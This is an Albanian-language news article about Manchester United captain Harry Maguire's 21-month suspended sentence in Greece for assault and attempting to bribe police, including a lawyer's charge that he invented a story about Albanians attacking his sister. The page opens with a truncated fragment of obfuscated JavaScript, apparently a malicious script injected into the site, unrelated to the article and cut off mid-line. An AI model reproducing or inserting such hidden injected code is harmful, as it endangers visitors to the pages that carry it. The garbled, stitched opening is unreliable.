;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Gënjeu se motrën deshën t’ia përdhunojnë shqiptarët, kapiteni i Manchester pranon vendimin e gjykatës

By

Kapiteni i Manchester United, Harry Maguire u përball me katër akuza nga autoritetet greke për sulm, abuzim verbal, sulm ndaj policisë dhe përpjekje për të korruptuar policinë helene.

Maguire dhe miqtë e tij shpikën një histori për shqiptarët që gjoja i sulmuan të motrën e tij.

Vëllai i futbollistit Joe u akuzua gjithashtu për sulm dhe përpjekje për ryshfet ndaj policisë.

Harry Maguire i është dhënë 21 muaj dënim me kusht për sulm dhe ryshfet ndaj policisë greke.

Avokati grek i policëve të sulmuar nga Maguire tha se ylli i Manchester United duhet të ulë kokën me turp, për ‘shpikjen e një mali gënjeshtrash’ për “shqiptarët që u përpiqën t’i sulmojnë motrën”.

Harry Maguire nuk ishte në gjyq, megjithëse babai i tij Alan është duke marrë pjesë në gjykimin, që po zhvillohet në Greqi.

Maguire, 27 vjeç, u shpall fajtor për sulmin ndaj policisë, abuzimit verbale dhe përpjekjen për të korruptuar policinë greke, pas sherrit të së premtes së kaluar – vetëm disa orë pasi ai mori mbështetjen e menaxherit të Anglisë, Gareth Southgate, i cili këtë pasdite e thirri në skuadrën kombëtare.

Ioannis Paradissis, avokat për dy nga gjashtë policët, i përfshirë në ngjarje, i thanë MailOnline: “Harry Maguire duhet t’i vijë turp. Ai ka shpikur një mal gënjeshtrash dhe nuk pati guximin të kërkojë falje. Ai ka fyer oficerët tanë të policisë dhe  bashkë me miqtë e tij la tre prej tyre të plagosur. Ata duhej të dërgoheshin në spital, sepse u rrahën brutalisht nga Maguire, vëllai i tij Joe dhe shoku i tyre. Maguire është model, ai duhet të ulë kokën me turp dhe të kthehet në Greqi për të kërkuar falje.

D.P./Shqiptarja.com

Artikuj të ngjashëm